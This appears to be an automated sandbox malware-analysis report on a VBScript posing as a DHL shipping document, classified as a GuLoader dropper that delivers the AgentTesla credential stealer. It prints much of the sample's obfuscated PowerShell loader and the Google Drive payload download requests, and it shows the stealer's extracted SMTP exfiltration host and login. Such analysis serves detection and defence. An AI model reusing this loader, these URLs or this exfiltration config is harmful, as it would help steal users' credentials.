Windows Analysis Report
DHL Shipping doc.vbs

Overview

General Information

Sample name: DHL Shipping doc.vbs
Analysis ID: 1430756
MD5: e483b9251c12c243495cc209ff1fa8e1
SHA1: 3b1d7bdc1563c60ea44c9dd410018879fa1e392e
SHA256: ab7caea9be94fcd8bf2b3bb9a1da2fbc4af30134a190718ffd81cdb4cc9a3641
Tags: DHLvbs

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6556 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated script omitted]" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7096 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5932 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated script omitted]" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7128 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 2668 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

{"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}

Source: 00000004.00000002.2123886427.0000000008920000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000004.00000002.2125155356.000000000A967000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
            Source: amsi64_6692.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
            • 0x10237:$b2: ::FromBase64String(
            • 0xd5b2:$s1: -join
            • 0x6d5e:$s4: +=
            • 0x6e20:$s4: +=
            • 0xb047:$s4: +=
            • 0xd164:$s4: +=
            • 0xd44e:$s4: +=
            • 0xd594:$s4: +=
            • 0xf7e2:$s4: +=
            • 0xf862:$s4: +=
            • 0xf928:$s4: +=
            • 0xf9a8:$s4: +=
            • 0xfb7e:$s4: +=
            • 0xfc02:$s4: +=
            • 0xdccb:$e4: Get-WmiObject
            • 0xdeba:$e4: Get-Process
            • 0xdf12:$e4: Start-Process
            Source: amsi32_5932.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
            • 0x1018b:$b2: ::FromBase64String(
            • 0xd5b2:$s1: -join
            • 0x6d5e:$s4: +=
            • 0x6e20:$s4: +=
            • 0xb047:$s4: +=
            • 0xd164:$s4: +=
            • 0xd44e:$s4: +=
            • 0xd594:$s4: +=
            • 0xf7e2:$s4: +=
            • 0xf862:$s4: +=
            • 0xf928:$s4: +=
            • 0xf9a8:$s4: +=
            • 0xfb7e:$s4: +=
            • 0xfc02:$s4: +=
            • 0xdccb:$e4: Get-WmiObject
            • 0xdeba:$e4: Get-Process
            • 0xdf12:$e4: Start-Process
            • 0x17d1e:$e4: Get-Process

            System Summary

            Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", CommandLine|base64offset|contains: J), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", ProcessId: 6556, ProcessName: wscript.exe
            Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", CommandLine|base64offset|contains: J), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", ProcessId: 6556, ProcessName: wscript.exe
            Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated script omitted]"
            No Snort rule has matched

            AV Detection

            Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
            Source: conhost.exe.6720.2.memstrmin, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}
            Source: DHL Shipping doc.vbs, Virustotal: Detection: 14%
            Source: unknown, HTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2122178024.0000000008500000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2116646966.0000000007667000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2116646966.00000000076E2000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global traffic, TCP traffic: 192.168.2.4:49741 -> 114.142.162.17:26
            Source: Joe Sandbox View, IP Address: 114.142.162.17
            Source: Joe Sandbox View, IP Address: 104.26.13.205
            Source: Joe Sandbox View, ASN Name: SERVERMULE-AS-APNimbus2PtyLtdAU
            Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknown, DNS query: name: api.ipify.org
            Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9 HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, Host: drive.google.com, Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected: GET /download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, Host: drive.usercontent.google.com, Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, Host: drive.google.com, Cache-Control: no-cache
            Source: global traffic, HTTP traffic detected: GET /download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, Cache-Control: no-cache, Host: drive.usercontent.google.com, Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0, Host: api.ipify.org, Connection: Keep-Alive
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2

            System Summary

            Source: amsi64_6692.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_5932.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6692, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 5932, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7520
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7520
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B 
BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
            Source: DHL Shipping doc.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi64_6692.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_5932.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6692, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 5932, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@12/7@5/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Aptychus.Whi
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ireixikg.yh2.ps1
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6692
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5932
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: DHL Shipping doc.vbsVirustotal: Detection: 14%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk 
ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2122178024.0000000008500000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2116646966.0000000007667000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2116646966.00000000076E2000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal)", "0")
            Source: Yara match File source: 00000004.00000002.2125155356.000000000A967000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.2123886427.0000000008920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.2112300960.0000000005ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Seashells1)$global:Cornett147 = [System.Text.Encoding]::ASCII.GetString($Procline)$global:Patellula=$Cornett147.substring(305164,29054)<#Blotless Lensstyres objet Spermatozoal #>$Foo
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Streptaster $Nanocephalus $kalkuleres), (Superassuming @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Plantings = [AppDomain]::CurrentDomain.GetAssemblies
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bispernes57)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Dvrgpilens, $false).DefineType($Endoproct, $T
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Seashells1)$global:Cornett147 = [System.Text.Encoding]::ASCII.GetString($Procline)$global:Patellula=$Cornett147.substring(305164,29054)<#Blotless Lensstyres objet Spermatozoal #>$Foo
